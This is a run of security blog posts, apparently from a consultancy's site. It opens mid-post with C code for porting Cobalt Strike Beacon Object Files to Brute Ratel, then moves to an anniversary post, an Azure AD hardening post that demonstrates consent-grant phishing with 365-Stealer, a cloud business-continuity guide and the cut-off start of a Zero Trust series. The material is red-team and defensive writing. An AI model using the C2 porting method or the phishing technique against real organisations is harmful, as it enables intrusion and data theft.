) 
{
	const char * hostname = NULL;
	const char * servicename = NULL;
	DWORD result = ERROR_SUCCESS;
	datap parser;
	init_enums();
	BeaconDataParse(&parser, Buffer, Length);
	hostname = BeaconDataExtract(&parser, NULL);
	//snip
	if ((gscManager = ADVAPI32$OpenSCManagerA(hostname, SERVICES_ACTIVE_DATABASEA, SC_MANAGER_CONNECT | GENERIC_READ)) == NULL)

You can see that this BOF takes the hostname parameter from the “Data Parser API” (BeaconDataExtract), which has no equivalent in BRC4.

At this point I figured that instead of coming up with some hacky fix I’d work out a proper solution that works more reliably and is more flexible: after all, I didn’t want to manually edit all the BOFs I use on a regular basis and troubleshoot API replacements.

Approach 2: True Compatibility

Since replacing APIs was already tricky in some cases and just impossible for higher-level APIs, I was searching for a solution that allowed me to (ideally) not touch any API calls in BOFs’ source code at all. There are two challenges to solve: allowing BOFs to call CS APIs and transforming their entrypoint to BRC4’s signature.

Compatibility Layer

Luckily, I wasn’t the first one to attempt this: TrustedSec’s COFFLoader is able to execute arbitrary compiled CS BOFs which means that it treats BOFs as blackboxes and introduces a compatibility layer that implements the CS BOF API. With this approach in mind I modelled the following design:

The compatibility layer

The idea is simple:

The CS API definitions included in BOF source code (usually called beacon.h) are replaced with stubs that don’t import the actual API but instead call into the compatibility layer. The compatibility layer, in turn, imports the BRC4 BOF API and calls it as needed.

COFFLoader’s compatibility layer is very readable and straightforward to understand. It implements all the higher-level concepts missing in the BRC4 API. One only needs to copy its implementation and swap out the bits that require imports, such as string or memory utilities. These should be replaced with BRC4’s equivalents (e.g. replacing memcpy with BadgerMemcpy) or, less ideally, with MSVCRT imports (e.g. vsnprintf for string formatting). For example, the BeaconFormatAlloc API can be implemented as follows:

void BeaconFormatAlloc(formatp* format, int maxsz) {
	if (format == NULL) return;
	format->original = (char*)BadgerAlloc(maxsz);
	format->buffer = format->original;
	format->length = 0;
	format->size = maxsz;
}
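
Similarly, other parts of the CS Output API can be backed by BadgerDispatch. The fragment below is our own minimal sketch (not COFFLoader’s or CS2BR’s actual code): it assumes the wrapper entrypoint shown in the next section has stored BRC4’s dispatch pointer in a global variable we call gDispatch, and it relies on the BadgerAlloc/BadgerMemcpy/BadgerFree declarations from badger_exports.h.

// Assumed to be set by the BRC4 wrapper entrypoint before the BOF runs (see next section).
extern WCHAR** gDispatch;

// CS Output API backed by BRC4's BadgerDispatch. The buffer handed to
// BeaconOutput is not necessarily NUL-terminated, so copy it first.
void BeaconOutput(int type, char* data, int len) {
	(void)type; // output types (e.g. CALLBACK_OUTPUT) are not distinguished in this sketch
	if (data == NULL || len <= 0) return;
	char* tmp = (char*)BadgerAlloc(len + 1);
	if (tmp == NULL) return;
	BadgerMemcpy(tmp, data, len);
	tmp[len] = 0;
	BadgerDispatch(gDispatch, "%s", tmp);
	BadgerFree((PVOID*)&tmp); // assuming the BadgerFree(PVOID*) declaration from badger_exports.h
}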

For the sake of completeness: the compatibility layer should also include imports to the WinAPI functions included by default in CS (GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary).

As a result, following this approach won’t tamper with the BOFs’ original logic but lets us implement the CS API ourselves, which in turn allows our BOFs to run in BRC4 now. Well, almost: the entrypoint isn’t compatible yet, and that’s not necessarily trivial.

Wrapping the Entrypoint

As we saw in the first attempt, porting the entrypoint from CS to BRC4 BOFs isn’t really tricky as we only need to change the function signature. It does get tricky if our BOF uses its start parameters (and thereby CS’s Data Parser API) though:

This API allows passing arbitrary data to CS BOFs. To achieve this, CS BOFs can ship with CNA scripts that allow the CS client to query input data (such as files) from operators, which the CNA assembles into a binary blob. This blob is sent along with the BOF itself to the implant (“beacon”). The BeaconData* APIs (which make up the Data Parser API) allow BOFs to disassemble this blob into structured data again. BRC4 doesn’t have this scripting capability and its BOF entrypoint only allows passing string-based arguments instead.

Again, COFFLoader solved the same problem before: it comes with a Python script that encodes arbitrary input into a hex-string that can be deserialized to a byte-buffer and passed to CS BOF entrypoints. Following the same approach, I worked out the following rather simple addition to the design above:

Wrapped entrypoint

Once more, the idea is simple:

Operators encode their inputs into a string and pass it to the BOF using BRC4’s coffexec command. A minimal BRC4 entrypoint is appended to the BOF source code. This entrypoint decodes the supplied input string into a buffer and passes that buffer to the original CS entrypoint.
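
To make this tangible, here is a minimal sketch of such a wrapper entrypoint. It is our own illustration rather than CS2BR’s actual implementation: it assumes the operator passes a single hex-encoded argument, and the gDispatch global and HexNibble helper are names we made up for this example.

WCHAR** gDispatch = NULL; // kept global so the compatibility layer can reach BadgerDispatch

// Decode a single hex character; invalid characters are treated as 0 for brevity.
static int HexNibble(char c) {
	if (c >= '0' && c <= '9') return c - '0';
	if (c >= 'a' && c <= 'f') return c - 'a' + 10;
	if (c >= 'A' && c <= 'F') return c - 'A' + 10;
	return 0;
}

// Wrapper entrypoint: turn the hex-encoded argument back into the binary
// blob the original CS entrypoint expects, then hand it over untouched.
// go() is the unmodified CS entrypoint defined earlier in the same source file.
VOID coffee(char** Args, int len, WCHAR** dispatch) {
	gDispatch = dispatch;
	if (len < 1 || Args[0] == NULL) { go(NULL, 0); return; }
	int hexLen = (int)BadgerStrlen(Args[0]);
	int rawLen = hexLen / 2;
	char* raw = (char*)BadgerAlloc(rawLen);
	if (raw == NULL) return;
	for (int i = 0; i < rawLen; i++) {
		raw[i] = (char)((HexNibble(Args[0][2 * i]) << 4) | HexNibble(Args[0][2 * i + 1]));
	}
	go(raw, rawLen);
}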

Summary

In essence, this approach consists of only three steps:

  1. Replace CS API imports with compatibility layer implementations
  2. Wrap CS entrypoint with a custom BRC4 entrypoint that prepares input for the Data parser API
  3. Manually encode execution parameters

This still isn’t a perfect solution but leaves us with a couple of pros and cons:

  • ✅ Doesn’t touch the original BOF’s logic
  • ✅ Flexibility: the same approach works for most (if not all) BOFs out there
  • ❌ Requires (somewhat) elaborate compatibility implementation
  • ❌ Requires some way to inject the compatibility layer (e.g. via source code)

III. Coming up next

Now that we have a solid and flexible approach to run CS BOFs on BRC4, there’s only one thing missing – a tool that automates it all!

We will publish CS2BR – a tool that does just that – as an open source project on Github along with a follow-up blogpost all about it soon. Stay tuned!

Moritz Thomas

Moritz Thomas

Moritz is a senior IT security consultant and red teamer at NVISO.
When he isn’t infiltrating networks or exfiltrating data, he is usually knees deep in research and development, working on new techniques and tools in red teaming.

We’re celebrating our 10th anniversary!

15 May 2023 at 06:54


From 5 people to almost 250 people. From working from our founders’ apartment to five offices in four countries. From an unknown challenger to being a reference in multiple fields in cyber security.

As a company, NVISO has come a long way since 2013 and we want to take a moment to celebrate what we have accomplished together so far.

NVISO celebrates a decade of European cyber security expertise

In 2013, NVISO was founded by five young security professionals with a dream:
To build a home and a hub for cyber security experts, here in the heart of Europe.

  • A team built on strong values.
  • A place that prioritizes personal growth and encourages everyone to innovate.
  • A community of experts that strives to be the best at what they do.
  • All working towards the mission of protecting European society from potentially devastating cyber attacks.

Together, we made it a reality!

This would not have been possible without the trust of our clients & partners and, most crucially, the dedication of every single NVISO bird. Thank you all!

Over the past decade, our team has made significant contributions to the field of cybersecurity through research and innovative solutions.

So, let’s take a trip down memory lane and revisit ten of the most influential articles from our blog!

  1. ApkScan
    Back in 2013, our first research project was a scanner for APKs; that Android malware analysis tool was very successful, being cited in academic papers, and helped us rapidly build knowledge and experience with what was then a relatively new challenge, mobile security. (Read more)

  2. Intercept Flutter traffic on iOS and Android
    Mobile security remains one of our big focus points, and this blogpost offers practical guidance for other testers on how to bypass SSL pinning, intercept HTTPS traffic, and use ProxyDroid during their mobile security assessments. (Read more)

  3. My journey reaching #1 on Hack The Box Belgium – 10 tips, tricks and lessons learned
    Inspiring others by sharing a personal success story – in this case, reaching the #1 spot on Hack The Box Belgium – is something we really encourage our colleagues to do. Combining hands-on tips with a few motivational memes was the recipe for this popular & often-shared blog post! (Read more)

  4. Painless Cuckoo Sandbox Installation
    Sharing hands-on practical tutorials on how to solve a certain problem we had to deal with ourselves has proven to be a good source for blog posts: practical tutorials where we share source code are some of the most searched blog posts we publish. This particular blog post explains how to set up a Cuckoo sandbox for analyzing malware samples, which is useful for blue team members who need to analyze a suspected malware sample without submitting it to online malware analysis services that may alert adversaries. (Read more)

  5. A practical guide to RFID badge copying
    Deciding which information (not) to publish is always an important balancing act: on one hand, we want to share important information about vulnerabilities as much as possible, while also protecting potential victims without encouraging illicit use of the information. We decided to share this particular blog post to raise awareness about the potential security risks associated with RFID card reading systems, which are often the sole factor of security that prevents unauthorized access to buildings, server rooms, and offices. The post demonstrates how easy it is to clone and abuse RFID cards using specialized hardware, such as the Proxmark3, when the card reader security mechanism is insufficiently secured. (Read more)

  6. DeTT&CT: Mapping detection to MITRE ATT&CK
    A detailed and hands-on guide on mapping your detection capabilities to MITRE ATT&CK using MITRE DeTT&CT. Using this, it becomes easier to build and maintain rules and to spot your blind spots! (Read more)

  7. Another spin to Gamification: how we used Gather.town to build a (great!) Cyber Security Game
    People are at the heart of cybersecurity. In this blog post, we outline how we crafted an – if we may say so ourselves – fun and informative game using Gather.town to promote cybersecurity awareness, and tell you how you can too. (Read more)

  8. PowerShell Inside a Certificate? – Part 1
    Didier Stevens outlines in this blog post how we crafted YARA detection rules that don’t just detect things we know are bad, but also check whether things actually have the format we expect them to. This way we found some PowerShell code hidden in certificate files. (Read more)

  9. Detecting DDE in MS Office documents
    Didier Stevens shares in this blog post how to detect Dynamic Data Exchange, an old technology often abused to weaponize MS Office documents. We believe sharing tips and detection rules like this one makes us all more secure in the end! (Read more)

  10. Under the hood: Hiding data in JPEG images
    In this lighthearted blog post, we dive under the hood of how you can hide your secrets inside a JPEG file. We recommend using this as a party trick or as a fun challenge, not for your TLP Red stuff! (Read more)



Enforce Zero Trust in Microsoft 365 – Part 2: Protect against external users and applications

12 May 2023 at 07:00
Enforce Zero Trust in Microsoft 365 - Part 2: Protect against external users and applications

In the first blog post of this series, we have seen how strong authentication, i.e., Multi-Factor Authentication (MFA), could be enforced for users using a free Azure Active Directory subscription within the Microsoft 365 environment.

In this blog post, we will continue to harden the configuration of our Azure AD tenant to enforce Zero Trust security without any license requirement. Specifically, we will see how our organization can protect against external users and prevent malicious applications from accessing our tenant.


Settings hardening

Because some default settings in Azure Active Directory are not secure and might introduce security issues within our organization, I wanted to quickly go over them and see how they could be used by malicious actors.

Guest users

We haven’t discussed guest users so far because access controls for guest users can’t be enforced using an Azure AD free license. However, guest users might be the entry door for attackers into our Microsoft 365 environment. Indeed, by compromising a user in a partner’s environment, adversaries directly gain access to our environment because of the implicit trust relationship that is automatically set up when inviting guest users. Therefore, we can either assume that guest users are correctly protected in their home tenant, or restrict or disable guest user invitations. (We will see in a later blog post that even if guest users have the appropriate security controls enforced in their home tenant, these controls might not be enforced in certain circumstances when accessing our tenant, i.e., the resource tenant.) In any case, the way guest users are managed is an important consideration for our Zero Trust approach. In our case, we will not simply block guest user invites, because collaboration with external parties is an important aspect of our business and will be required. Instead, we want to take a proactive approach to this problem by setting a solid foundation before it is too late.

First, we want to ensure that no one in the organization, except authorized users, can invite guest users. Indeed, by default, all users in our organization, including guest users, can invite other guest users. This could represent a serious weakness in our Zero Trust approach. Therefore, we will only allow users assigned to specific administrator roles to invite guest users (this includes the Global Administrators, User Administrators and Guest Inviters roles).

Guest invite restrictions are configured in Azure AD. For that purpose, go to the Azure Portal > Azure Active Directory > Users > User Settings > Manage external collaboration settings under External users. Choosing the most restrictive option disables the ability to invite guest users.

Guest invite restrictions in Azure AD
Guest invite restrictions

Moreover, because our organization works with defined partners, users should only be able to collaborate with them. We can therefore further restrict invitations by specifying domains in the collaboration restrictions settings:

Collaboration restrictions
Collaboration restrictions

For those restrictions, a reliable process is required to clearly define who can manage guest users and external domains, especially if you regularly collaborate with different partners.

By default, guest users have extensive permissions. If an attacker takes over a guest account, the information to which the guest user has access may be used for advanced attacks on our company. For this reason, we want to restrict them as much as possible. It might not be required for guest users to be able to enumerate resources in our Azure Active Directory tenant. This could allow adversaries that compromised a guest user to gain information on users within our tenant, such as viewing our employees to send (consent) phishing emails and gain initial access, or viewing other partners to deceive them by impersonating our company or an employee. Therefore, we want to limit guest user permissions.

Guest user access restrictions in Azure AD
Guest user access restrictions

With these restrictions implemented for guest users, we have already decreased the potential impact that a compromised guest user could have in our environment. However, remember that with the current configuration, specific access controls, such as strong authentication for guest users, are not enforced to access our tenant. This means that a compromised guest user might still be used to access our environment.

External applications

Applications can be integrated into Azure Active Directory to make them accessible to users. There are many types of applications that can be made accessible through Azure AD, such as cloud applications (also known as pre-integrated applications) like Office 365, the Azure Portal or Salesforce, custom applications, and on-premises applications.

Users can consent to applications to allow these applications to access organization data or a protected resource in the tenant on their behalf. Indeed, applications can request API permissions so that they can work properly. These API permissions include accessing a user’s profile, a user’s mailbox content, sending emails, etc. This can also be seen as an entry door for adversaries to gain access to information in our environment. For example, attackers could trick an employee by sending a consent link (consent phishing) to an employee for a malicious application. If the user consents, attackers would have the permissions the user has consented to. Even worse, an administrator might consent to an application for the entire organization. This means that a malicious application could potentially gain access to all directory objects.

Let’s abuse it!

If user consent is allowed in our Azure AD tenant, adversaries could send consent grant phishing to employees. Let’s see how this could be done.

First, because guest invitation restrictions were initially not configured, adversaries could access our Azure AD tenant and gather a list of our employees as well as their email addresses. They then used this list to create a phishing campaign for a Microsoft Advertising Certification study guide.

Phishing email
Phishing email

Because one employee was very eager to try out this new limited edition guide, they clicked the link and signed in with their credentials.

Application permissions request
Permission consent

Unfortunately, the employee had administrative permissions in our tenant and could therefore grant consent on behalf of the entire organization. Everyone should benefit from this free offer, right?… Not really, no. Indeed, as shown in the above screenshot, the application, which is not verified, requires a lot of access, such as sending and viewing emails, read and write access to mailbox settings, and read access to notes, files, etc.

Once the user accepts, adversaries can retrieve information about the user as well as about the organization. Additionally, they can access the user’s mailbox, OneDrive files and notes.

For this demonstration, I used 365-Stealer from AlteredSecurity to set up the phishing page and to access users in the directory:

Phished users in 365-Stealer
365-Stealer

How to protect ourselves against consent grant phishing?

There are no bulletproof solutions to protect users from phishing, unless you globally disable the ability for users to receive emails and messages, which is very far from ideal. Indeed, even with Office 365 threat policies, such as anti-phishing policies, and user awareness, malicious actors are always finding new ways of bypassing these policies and tricking users. However, what we can do is disable the ability for users to consent to applications in Azure AD.

To restrict user consent for applications, it is possible to disable or restrict the applications and permissions that users can consent to. Unless it is required, it is highly recommended to disable user consent. This will be done for our organization’s tenant to prevent consent grant attacks.

Consent and permissions for users
Consent and permissions for users

This setting can be configured in Azure Portal > Azure Active Directory > Users > User settings > Manage how end users launch and view their applications under Enterprise applications > Consent and permissions.

Besides blocking this functionality, it is also possible to only allow users to consent to permissions classified as low impact. Microsoft provides the ability to define our own classification model for application permissions, ranging from low to high, as shown below. In that case, administrators can select the Allow user consent for apps from verified publishers, for selected permissions (Recommended) setting in the user consent settings page:

Permission classifications for applications in Azure AD
Permission classifications for applications in Azure AD

Conclusion

In this blog post, we went over different settings in Azure AD that can be restricted to prevent malicious users from being added to our tenant. Moreover, we have seen how application consent settings can be abused through consent grant phishing and how we can protect against it.

I have selected these settings among others because we usually see that they are not restricted in most environments during our security assessments. However, configuring only these settings is not enough to protect your environment against malicious and unauthorized actions. If you would like to know more about how NVISO can help you secure your environment, feel free to reach out or to check our website.

In the next blog post, we will go over Azure AD Conditional Access policies, see how they can be used to further increase the security posture of our environment and implement our Zero Trust security approach.

About the author

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

Implementing Business Continuity on Azure

5 May 2023 at 07:00

There is a general misconception among cloud consumers that the availability of their resources in the cloud is always guaranteed. This is not true since all cloud providers, including Microsoft, offer specific SLAs for their products that almost never reach an availability target of 100%. For the consumers who have deployed critical resources and applications to the cloud, reaching the company-defined targets for Business Continuity can be technically challenging and confusing. The purpose of this blog post is to provide practical guidance on how Business Continuity is expressed on the cloud, how it can be implemented for many Azure IaaS and PaaS services and what real-world problems each solution attempts to solve.

Introduction

Before we dive into the technical Azure-specific details, let’s explain what Business Continuity is and what it involves.

Business Continuity is the capability of the organization to continue the delivery of products or services at acceptable predefined levels following a disruptive incident. According to ISO 22301, business continuity is not limited only to IT and it involves many enterprise aspects.

In this blog post, we will focus on the business continuity aspects related to IT. Each of them corresponds to a specific type of SLA that you may have internally or with your customers, so there are multiple aspects of Business Continuity that may be applicable to you.

If it’s important for you to keep your services always up and running, you should focus on High Availability. This is the ability of a system to be continuously operational, or, in other words, have an uptime percentage of near 100%. It is generally achieved by implementing redundant, mirrored copies of the hardware and data, so that if one component fails, another one takes over.

If fluctuating demand and bottlenecks cause your systems to struggle, then you may need to focus on Scalability. This is the ability of a system to scale up or scale down cloud resources as needed to meet fluctuating demand. It can be considered as an aspect of Business Continuity, since peaks in demand can be the result or the cause of an incident.

Finally, to protect data that are critical to your company’s functionality and need to be always available and recoverable, you should implement Backup. This is the duplication of data to a secondary location, so that if the primary copy is harmed or becomes unavailable, data from the other location can be retrieved and the system can be rolled back to a specific point in time.

The following diagram shows an analogy between the aforementioned terms and the problems they tackle.

Business Continuity: Mapping of problems and solutions

It is important to note that the implementation of any of the controls described in this blogpost should be based on a structured business continuity assessment/plan, and should be selected based on the requirements of your environment or application. Improvident implementation of controls could result in undue costs or in inefficient protection.

Implementing High Availability

Depending on the required uptime of your application or system and the scale of disaster you need to be able to recover from, there are many ways to implement high availability in Azure. When choosing the controls that will be implemented in your environment, you should always consider that the availability in a chain of resources is determined by the weakest link in the chain. For example, in the case of an application composed of a front-end server and a database, if the web server is spread across multiple availability zones but the database is single-instance, the whole application will not be available anymore if the availability zone of the database goes down. With the above in mind, we present below the different options provided by Azure, sorted by increasing complexity and costs.

Protection against hardware failures

Small-scale technical or hardware issues may affect single-instance components. To avoid this, the component should be mirrored to a secondary hardware volume. On Azure, depending on your cloud computing state, this can be implemented as follows:

IaaS

When the component is a Virtual Machine (VM), this can be achieved by using availability sets. An availability set is a logical grouping of VMs that allows Azure to understand how your application is built to provide for redundancy and availability. While for single-instance VMs Azure guarantees a 99.9% uptime SLA, by using availability sets the uptime is increased to 99.95%. To use availability sets on Azure VMs, you need to perform the following steps:

  1. Create an availability set;
  2. Create new VMs; in the creation wizard, under “Availability options” choose “Availability set” and then select the previously created set.

Note: It is not possible to add existing VMs to an availability set after their creation.

PaaS

Azure PaaS components are protected against local hardware failures by design, guaranteeing higher uptime SLAs than IaaS. Specifically:

  • Storage Accounts: Microsoft ensures 3 instances of the service when using the default redundancy option (Locally redundant Storage – LRS). This offers 99.999999999% (11 nines) durability of objects over a given year.
  • SQL Databases: By default, Microsoft ensures at least two instances of the service within the same data center, reaching 99.99% uptime.
  • Cosmos DB: By default, Microsoft provides three replicas (individual nodes) within a cluster, ensuring an SLA of 99.99% uptime.
  • App Service: Microsoft guarantees an SLA of 99.95% uptime for App Services, for tiers other than Free or Shared.

Protection against datacenter failures

To provide the option of protecting against failures that affect the whole datacenter, such as fire, power and cooling disruptions or flood, Microsoft has introduced the concept of availability zones. Availability zones are unique physical locations within an Azure region, each made up of one or more datacenters with independent power, cooling, and networking. The creation of multiple instances of services across two or more zones provides increased high availability, as it protects both against hardware and against datacenter failures.

Azure Availability Zones
Source: What are Azure regions and availability zones? | Microsoft Learn

Based on your Cloud computing model, such protection can be achieved as follows:

IaaS

Virtual machines can be deployed across multiple availability zones to provide an uptime SLA of 99.99%. This can be done with the following steps:

  1. Create a VM; under “Availability options” select “Availability zone” and specify a zone. This will be the primary zone of your VM.
  2. Open the VM.
  3. Under Operations, select “Disaster recovery” and set the option “Disaster Recovery between Availability Zones?” to “Yes”. Under “Advanced settings” you will be able to see or change the secondary zone.
  4. Click on “Review and start replication”.

PaaS

When it comes to PaaS services, it is generally easier to deploy them across multiple availability zones. Specifically:

  • Storage Accounts:
    • Microsoft ensures 3 instances of the service across three different availability zones (Zone-redundant Storage – ZRS). This offers 99.9999999999% (12 nines) durability of objects over a given year.
    • The option can be enabled during the Storage Account creation, under Basics – Redundancy.
  • SQL Databases:
    • Zone redundancy is available in the General Purpose, Hyperscale, Business Critical and Premium service tiers. The SLA depends on the tier and can reach 99.995% uptime.
    • The option can be configured during the SQL DB creation, under the Service tier selection menu, or under Settings – Compute + storage for existing databases.
  • Azure Cosmos DB Accounts:
    • Enabling zone redundancy in an Azure Cosmos DB account can increase the uptime SLA to 99.995%.
    • The option can be selected during the Cosmos DB Account creation, under Global Distribution – Availability Zones.
  • App Service:
    • Zone redundancy is only available in either Premium v2 or Premium v3 App Service Plans for Web Apps and in Elastic P2 for Function Apps. At the time of writing, Microsoft has not published specific SLAs for zone-redundant App Services, but it guarantees at least three instances of the service.
    • The option can be enabled during the creation of the Service Plan, under Zone redundancy.

Note: It is not possible to enable availability zone support after the creation of any of the above components.

Protection against regional failures

Finally, to protect against regional failures that can affect many adjacent datacenters and can be caused by large-scale natural and man-made disasters (e.g., earthquake, tornados, war), Microsoft has introduced the concept of availability regions. Azure regions are physical regions all over the world, designed to offer protection against local disasters within availability zones and against regional or large geography disasters by making use of another region and replicating the workloads to that region. The secondary region could be considered as the disaster recovery site. Availability regions can be used independently of availability zones or in conjunction with them.

Azure Availability Regions
Source: What are Azure regions and availability zones? | Microsoft Learn

Based on the Cloud computing model of the application components that you want to protect, you have the following options:

IaaS

Virtual machines can be deployed across multiple availability regions to provide an uptime SLA of 99.99%. This capability is offered by the Azure Site Recovery service that orchestrates the replication, failover, and recovery of the VMs. Site Recovery can be implemented with the following steps:

  1. Open the VM for which you want to configure regional redundancy.
  2. Under Operations, select “Disaster recovery”, set the option “Disaster Recovery between Availability Zones?” to “No” and select a target region.
  3. Click on “Review and start replication”.

PaaS

PaaS services can be protected from regional disasters as follows:

  • Storage Accounts:
    • With the Geo-redundant Storage option (GRS), Microsoft ensures that there are 3 instances of the Storage Account in the primary region and another 3 instances in the secondary region. This offers 99.99999999999999% (16 nines) durability of objects over a given year. There is also the option of Geo-zone-redundant Storage (GZRS), which spreads the instances of the primary region across 3 different availability zones, to enable faster recovery times in case of a datacenter failure.
    • The option can be enabled under Data Management – Redundancy for an existing Storage Account.
  • SQL Databases:
    • An additional replica for read operations can be created in a secondary region and used as a disaster recovery site. The SLAs for the geo-redundant setup vary depending on the selected service tier.
    • The option can be configured for a given SQL DB, under the Service tier selection menu.
  • Azure Cosmos DB Accounts:
    • Enabling geo redundancy in an Azure Cosmos DB account can increase the SLA for read operations to 99.999%.
    • The option can be selected during the Cosmos DB Account creation, under Global Distribution – Geo-Redundancy, or for an existing Cosmos DB account under Settings – Replicate data globally.
  • App Service:
    • As of the time of writing, there is no geo-redundancy support for Azure App Service.

Before closing with High Availability, remember that a highly available system is a system that your customers and employees can rely on. It increases the credibility of your company, improves its reputation and offers peace of mind to your valuable users. Although costs may go up, depending on your implementation choices, it will help you establish yourself as a trustworthy partner.

Implementing scalability

For systems whose load can abruptly increase or decrease, a problem arises: How can you guarantee the available level of resources during high periods, while at the same time keeping your costs to the minimum during the low periods? This is the essence of scaling, and in the cloud, achieving this balance is much easier than in traditional, on-premises infrastructures. There are two main ways that an application can scale: vertical scaling and horizontal scaling. Vertical scaling (scaling up) increases the capacity of a resource, for example, by increasing the VM size, CPU, memory, etc. Horizontal scaling (scaling out) adds new instances of a resource, such as VMs or database replicas.

Vertical vs horizontal scaling

While vertical scaling can be achieved more easily, and without making any changes to the application, at some point it hits a limit where the system cannot be scaled more. On the other hand, horizontal scaling is more flexible, cheaper, and applies to big, distributed workloads. It also enables autoscaling, which is the process of dynamically allocating resources to ensure performance. That is why, especially in the Cloud, horizontal scaling is the recommended option.

The options Azure provides you with are as follows:

IaaS

Scalability of Virtual Machines in Azure can be achieved through Virtual Machine Scale Sets (VMSS). These represent groups of load-balanced VMs that provide scalability to applications by automatically increasing or decreasing the number of VM instances in response to demand or a defined schedule. VMSS can be deployed into one Availability Zone, multiple Availability Zones or even regionally.

During the creation of a VMSS resource, the cloud consumer can specify the scalability options and minimum instance number, the Load Balancer (or Application Gateway, in case of HTTPS traffic) that will be used, and other networking and orchestration options.

PaaS

In most cases, managed PaaS services have horizontal scaling and autoscaling built in. The ease of scaling these services is a major advantage of using Azure PaaS services.

Specifically for App service, we should point out that the scaling options depend on the App Service plan (tier) and can reach a maximum of 100 instances when using the Isolated tier.

Implementing backups

Although HA solves the problem of small or extended failures, what happens if the unavailability of data originates from a malicious threat, such as a ransomware attack? In this case, having a highly available infrastructure will simply replicate the encrypted/corrupted files everywhere almost immediately, leaving no recovery options. Here is where the value of remote data copies, that are unaffected by real-time modifications, lies. With Azure Backup, regular backups and snapshots of workloads are taken, so that in case of unauthorized modification or deletion, the service can be restored to a specific point in time.

Backups in Azure can be implemented both for IaaS and for PaaS services, and the options are presented below.

IaaS

VM backups can be either locally redundant or zone redundant. Recovery from backups can be implemented in two ways: the standard option generates backups once a day and maintains instant restore snapshots for 2 days. The enhanced option generates multiple backups per day, maintains instant restore snapshots for 7 days and ensures that snapshots are spread across zones for increased resiliency. The second option applies to VMs of high criticality.

In an existing Azure VM, Backups can be configured under Operations – Backup.

PaaS

Multiple backup options also exist for different PaaS services:

  • Storage Accounts:
    • Azure provides the option to configure operational backups of the blobs of a Storage Account.  This is a local backup solution that maintains data for a specified duration in the source storage account itself. Although a Backup Vault is required to manage the backup, there is no copy of the data stored in the Vault. The backup is continuous and allows the reversion to a specific point in time in case of data corruption.
    • The option can be configured under Data management – Data protection for existing Storage Accounts, by selecting the checkbox “Enable operational backup with Azure Backup” and following the necessary steps presented in the portal.
  • SQL Databases:
    • Azure gives the option of locally redundant, zone-redundant or geo-redundant backups.
    • Configuration can be performed with the option “Backup storage redundancy” under Settings – Compute + storage for existing databases, or under Basics – “Backup storage redundancy” during the database creation.
  • Azure Cosmos DB Accounts:
    • Two options are offered for backup functionality, either periodic (LRS or ZRS or GRS) or continuous backup. When using the periodic backup mode, which is the default one for all accounts, backups are taken at periodic intervals and the data can only be restored by creating a request with Microsoft’s support team. On the contrary, continuous backup facilitates the restoration to any point of time within either 7 or 30 days (depending on the tier) through the portal.
    • Can be configured under “Backup Policy” during creation, or under the “Backup & Restore” pane for existing accounts.
  • App Service:
    • Azure provides the possibility to backup an App’s content, configuration and database by enabling and scheduling periodic backups, which are stored in a Storage Account.
    • Backup and restoration options can be configured under Settings – Backups for existing App Services.

Overall, it is important to find the balance between the frequency of backups and the number of maintained past snapshots, in order to lose as little data as possible in case of an incident, be able to revert to a healthy past state and at the same time keep costs at an acceptable level for your company.

Conclusion

To conclude, it all comes down to one question: Can you survive? Can you recover from disasters as small as power interruptions to as big as pandemics and earthquakes? Business Continuity is the key to the answer. And in the modern, distributed Cloud world, all the capabilities are there – it’s just up to you, your dedication and commitment to implement the ones that are essential to your business.

Elpida Rouka

Elpida is an Information Security Consultant, with expertise in Azure/O365 Security, SIEM, Identity & Access management, Risk management, Information Security Management Systems (ISMS) and Business Continuity planning (ISO22301). She is always eager to create innovative high-quality solutions that precisely meet business needs.

Stijn Wellens

Stijn is a manager with experience in cloud and network security. He is Solution Lead for Cloud Security Assessments and Microsoft Cloud Security Engineering at NVISO. Besides the technical challenges during Azure and Microsoft 365 security roadmap implementations, Stijn enjoys coaching the teams by sharing his knowledge and experience.

Enforce Zero Trust in Microsoft 365 – Part 1: Setting the basics

2 May 2023 at 07:00

This first blog post is part of a series of blog posts related to the implementation of Zero Trust approach in Microsoft 365. This series will first cover the basics and then deep dive into the different features such as Azure Active Directory (Azure AD) Conditional Access policies, Microsoft Defender for Cloud Apps policies, Information Protection and Microsoft Endpoint Manager, to only cite a few.

In this first part, we will go over the basics that can be implemented in a Microsoft 365 environment to get started with Zero Trust. For the purpose of this blog post, we will assume that our organization has decided to migrate to the cloud. We have just started investigating which quick wins can be easily implemented, which features will need to be configured to ensure the security of identities and data, and which more advanced features could be used to meet specific use cases.

Of course, the journey to implement Zero Trust is not an easy one. Some important decisions will need to be made to ensure the relevant features are being used and correctly configured according to your business, compliance, and governance requirements without impacting user productivity. Therefore, the goal of this series of blog posts is to introduce you possible approaches to Zero Trust security in Microsoft 365.

Introduction

However, before starting we need to set the scene by quickly going over some principles.

First, what is a Zero Trust security approach? Well, this security model says that you should never trust anyone and that each request should be verified regardless of where the request originates or what the accessed resource is. In other words, this model will assume that each request comes from an uncontrolled or compromised network. Microsoft provides this nice illustration to represent the primary elements that contribute to Zero Trust in a Microsoft 365 environment:

Zero Trust approach in Microsoft 365
Zero Trust approach in Microsoft 365

We will go over these components as part of this blog post series.

You may wonder why I have decided to discuss Zero Trust in Microsoft 365. Because I think it is one of the most, if not the most, important aspects of a cloud environment. Indeed, with cloud environments, identities are considered as the new perimeter as these identities can be used to access Internet-facing administrative portals and applications from any Internet-connected device. 

Furthermore, even when security controls are enforced, it does not mean that the environment is secure. There were many attacks these past few months/years that allowed attackers to bypass security controls through social engineering, and phishing attacks, for example. Therefore, the goal is more to reduce the potential impact of a security breach on the environment than to prevent attacks from succeeding.

Finally, let’s go over some Microsoft 365 principles. When an organization signs up for a Microsoft 365 subscription, an Azure AD tenant is created as part of the underlying services. For data residency requirements, Microsoft lets you choose the logical region where you want to deploy your instance of Azure AD. This region will determine the location of the data center where your data will be stored. Moreover, Microsoft 365 uses Azure AD to manage user identities. Azure AD offers the possibility to integrate with an on-premises Active Directory Domain Services (AD DS) environment but also to manage integrated applications. Therefore, you should understand that most of the work to set up a Zero Trust approach will be done in Azure AD.

Let’s get started!

Our organization just bought a paid Microsoft 365 subscription which comes with a free subscription to Microsoft Azure AD. The free Azure AD subscription includes some basic features that will allow us to get started with our journey. Let’s go over them!

